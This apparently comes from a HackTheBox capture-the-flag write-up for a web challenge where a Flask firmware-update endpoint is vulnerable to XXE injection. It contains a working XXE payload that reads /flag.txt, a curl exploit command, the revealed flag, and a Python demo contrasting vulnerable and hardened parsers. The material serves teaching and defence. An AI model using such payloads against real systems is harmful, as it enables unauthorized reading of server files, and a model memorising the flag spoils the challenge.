Jailbreak - HackTheBox
Description
The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door's access port?
Target: 83.136.249.164:45064
Analysis
Initial Reconnaissance
Connected to the target and discovered a Flask/Werkzeug Python web application simulating a Pip-Boy device with multiple pages:
- STAT
- INV
- DATA
- MAP
- RADIO
- ROM
Vulnerability Discovery
- Found the /rom page, which contains a "Firmware Update" feature; the page accepts an XML configuration document as input
- Discovered /static/js/update.js, which reveals the API endpoint the page submits to:
  - Endpoint: POST /api/update
  - Content-Type: application/xml
The XML parser resolves external entities declared in the DTD of the submitted document, so the endpoint is vulnerable to XXE (XML External Entity) injection: an entity with a SYSTEM identifier is expanded to the contents of a local file, and because the server echoes the parsed Version field back in its response, that file content is reflected directly to the client.
Solution
XXE Payload
Crafted an XXE payload to read /flag.txt by defining an external entity that references the local file and placing the entity reference in the Version element, which the server echoes back:
```xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<FirmwareUpdateConfig>
  <Firmware>
    <Version>&xxe;</Version>
    <ReleaseDate>2077-10-21</ReleaseDate>
    <Description>Test</Description>
    <Checksum type="SHA-256">test</Checksum>
  </Firmware>
</FirmwareUpdateConfig>
```
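To show why the payload above works and what the fix looks like, here is an added example (written for this writeup, not the challenge's own server code) that models the /api/update handler with the Python standard-library SAX parser. It parses the same FirmwareUpdateConfig document twice: once with external general entity resolution switched on, which reproduces the vulnerable behaviour and pulls a local file into Version, and once with it switched off, the hardened setting (and the stdlib default since Python 3.7.1), where the entity reference is skipped and the file is never opened. The flag file, its contents and the handler names are constructed for the demo; the file:// URI form assumes a POSIX path.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class FirmwareVersionHandler(ContentHandler):
    """Collects the text of <Version>, the field /api/update echoes back."""

    def __init__(self):
        super().__init__()
        self.version = ""
        self._in_version = False

    def startElement(self, name, attrs):
        if name == "Version":
            self._in_version = True

    def endElement(self, name):
        if name == "Version":
            self._in_version = False

    def characters(self, content):
        # External entity content arrives here too, possibly in several chunks.
        if self._in_version:
            self.version += content


def parse_firmware_config(xml_bytes, resolve_external_entities):
    """Return the <Version> text from a FirmwareUpdateConfig document.

    resolve_external_entities=True loads external general entities (the
    misconfiguration behind the challenge); False is the hardened setting.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = FirmwareVersionHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.version.strip()


def build_xxe_payload(target_path):
    """Same shape as the writeup's payload, pointed at an arbitrary file (POSIX path assumed)."""
    return f"""<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://{target_path}"> ]>
<FirmwareUpdateConfig>
  <Firmware>
    <Version>&xxe;</Version>
    <ReleaseDate>2077-10-21</ReleaseDate>
    <Description>Test</Description>
    <Checksum type="SHA-256">test</Checksum>
  </Firmware>
</FirmwareUpdateConfig>""".encode()


def run_demo():
    """Stage a constructed flag file, then parse the payload with both settings."""
    secret = "HTB{constructed_sample_flag}"  # constructed value, not the real flag
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret + "\n")
        path = fh.name
    try:
        payload = build_xxe_payload(path)
        leaked = parse_firmware_config(payload, resolve_external_entities=True)
        safe = parse_firmware_config(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return {"secret": secret, "vulnerable": leaked, "hardened": safe}


if __name__ == "__main__":
    result = run_demo()
    print("vulnerable parser returned:", result["vulnerable"])
    print("hardened parser returned:  ", repr(result["hardened"]))
```

The hardened variant still parses the document and still accepts the DOCTYPE; it simply refuses to fetch anything the entity points at, so Version comes back empty instead of holding the file. For a real service the stricter choice is to reject any document that carries a DOCTYPE at all, since the same entity mechanism also supports out-of-band exfiltration and entity-expansion denial of service.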
Exploit Command
```bash
curl -s -X POST http://83.136.249.164:45064/api/update \
  -H "Content-Type: application/xml" \
  -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<FirmwareUpdateConfig>
  <Firmware>
    <Version>&xxe;</Version>
    <ReleaseDate>2077-10-21</ReleaseDate>
    <Description>Test</Description>
    <Checksum type="SHA-256">test</Checksum>
  </Firmware>
</FirmwareUpdateConfig>'
```
Response
```json
{
  "message": "Firmware version HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_465a1624a0deb4d0c01f93bffa85a977} update initiated."
}
```